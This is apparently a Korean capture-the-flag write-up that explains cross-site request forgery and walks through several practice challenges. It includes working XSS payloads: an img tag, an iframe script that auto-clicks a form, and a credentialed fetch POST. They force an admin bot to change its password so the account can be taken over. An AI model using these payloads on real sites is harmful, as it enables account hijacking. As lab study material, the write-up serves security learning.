팥들었슈

CSRF

사이트 간 요청 위조(또는 크로스 사이트 요청 위조, 영어: Cross-site request forgery, CSRF, XSRF)는 웹사이트 취약점 공격의 하나로, 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 특정 웹사이트에 요청하게 하는 공격을 말한다.

유명 경매 사이트인 옥션에서 발생한 개인정보 유출 사건에서 사용된 공격 방식 중 하나다.

사이트 간 스크립팅(XSS)을 이용한 공격이 사용자가 특정 웹사이트를 신용하는 점을 노린 것이라면, 사이트간 요청 위조는 특정 웹사이트가 사용자의 웹 브라우저를 신용하는 상태를 노린 것이다. 일단 사용자가 웹사이트에 로그인한 상태에서 사이트간 요청 위조 공격 코드가 삽입된 페이지를 열면, 공격 대상이 되는 웹사이트는 위조된 공격 명령이 믿을 수 있는 사용자로부터 발송된 것으로 판단하게 되어 공격에 노출된다. - 위키 백과 -

즉 사용자의 동의 없이 특정 요청을 서버에 전송하게 하는 방법을 의미한다.

이는 사용자의 pc에서 동작하므로 사용자의 session 탈취 없이(요청자가 이미 사용자이기 때문에 session을 가지고 있다.)

Ex) 게시판 등록에 img 태그 삽입(src는 비밀번호를 변경하는 URL)

사용자가 게시물을 확인하면 img태그는 이미지를 가져오기 위해 해당 src를 조회하게 되며 비밀번호가 변경된다.

위의 예제와 같이 CSRF는 XSS와 함께 사용시 유용하게 사용될 수 있다.

1, 2번과 동일한 문제

1. 비밀번호 변경 요청 확인

요청을 확인해보니 csrf token이라는 것이 추가 되었다.

2. XSS를 이용한 CSRF 공격

 2-1) iframe이 onload 될 함수정의

 2-2) iframe의 src를 마이페이지로 지정

 2-3) iframe이 모두 로드 되면 비밀번호 input tag에 value를 124로 지정

 2-4) iframe의 업데이트 버튼 클릭하도록 target.contentDocument.getElementById('signup-btnl').click() 추가

<script>
delete window.alert

var errorFunction = function() {
	var target = document.getElementById('myframe')
	delete target.contentWindow.alert 

	console.log(target)
	target.contentDocument.getElementsByName('pw')[0].value = 124
	console.log(target.contentDocument.getElementsByName('pw')[0].value)
	//document.getElementById('token_input').value = token
	target.contentDocument.getElementById('signup-btnl').click()
	this.src=''
}
</script>

<iframe onload='errorFunction()' name="myframe" src="http://ctf.segfaulthub.com:7575/csrf_3/mypage.php?user=aksrl26T"  id="myframe"></iframe>

3. 비밀번호 변경 확인

4. 관리자 봇으로 해당 url 전달

 alert이 발생하여서 실패.....

2. XSS를 이용한 CSRF 공격(다시)

 2-1) iframe에서 클릭하면 alert이 발생 하기 때문에 fetch를 통해 요청(html 랜더링 안해서)

 2-2) iframe에서 form데이터 받아와서 formData 구성

 2-3) 로그인 정보를 session에서 가져오기 때문에 credentioals : 'include'를 사용하여 세션아이디를 포함한 쿠키를 전달.

<script>

var sendForm = function() {

	var target = document.getElementById('myframe')
	target.contentDocument.getElementsByName('pw')[0].value = 111
	var form = target.contentDocument.getElementsByTagName('form')[0]
	var url = 'http://ctf.segfaulthub.com:7575/csrf_3/mypage_update.php'
	var formData = new FormData(form)

	for (var pair of formData.entries()) {
		    console.log(pair[0] + ': ' + pair[1]);
		}
	console.log(form)
	console.log(formData)
	
	console.log(target)

	fetch(url, {
    method: "POST",
		credentials: 'include',
    body: formData
  })
  .then(data => {
    // 성공적으로 응답을 받았을 때의 처리
    console.log()
	return data.text()
  })
.then(html => {
	console.log(html)
})
  .catch(error => {
    // 에러 처리
    console.error('Error:', error);
  });
}
</script>

<iframe onload='sendForm()' name="myframe" src="http://ctf.segfaulthub.com:7575/csrf_3/mypage.php?user=aksrl26T"  id="myframe"></iframe>

3. 비밀번호 변경 확인

4. 관리자 봇에게 접근하도록 요청

5. 관리자 계정으로 로그인

1번 문제와 동일하다.

비밀번호 update가 되는 요청을 찾은 뒤 XSS가 발생하는 위치에서 CSRF공격을 진행하면된다.

1. 비밀번호 변경 요청 확인

GET 방식으로도 동작하는지 확인

2. XSS로 POST방식의 CSRF공격

 2-1) form을 작성하여 method를 post로 지정 

 2-2) script에서 form을 찾아 submit

3. 비밀번호 변경 확인(로그아웃 후 재접속으로)

4. 관리자가 XSS, CSRF공격이 있는 게시물을 접속하도록 링크전달.

5. 관리자 계정으로 로그인

CSRF는 사용자가 특정 요청을 하도록 유도하는 방법이다. 

XSS로 사용자가 접근 했을 때 비밀번호를 변경하는 요청을 보내는 것이 핵심

1. 비밀번호 변경 요청 확인

My page 에서 비밀번호 변경을 요청한 결과 아래와 같이 나왔다.

POST 방식으로 pw를 넘겨서 비밀번호를 변경한다.

POST는 form을사용하여야 한다. 동일한 요청을 GET으로 변경하여 전송해보자.

GET 방식으로 비밀번호 변경이 된다.

2. XSS에서 해당 요청을 보내도록 수정

 2-1) XSS가 발생되는 게시판에 이미지 태그를 생성

 2-2) 이미지 태그의 src를 회원정보 변경 URL 링크로 입력

3. XSS와 CSRF가 있는 게시물을 들어간 뒤 비밀번호 변경확인

 비밀번호 확인 결과 변경된 것을 확인했음.

5. 비밀번호 변경 스크립트가 있는 게시물의 URL을 봇으로 넘겨서 aksrl25T_admin의 비밀번호를 124로 변경

6. aksrl25T_admin으로 로그인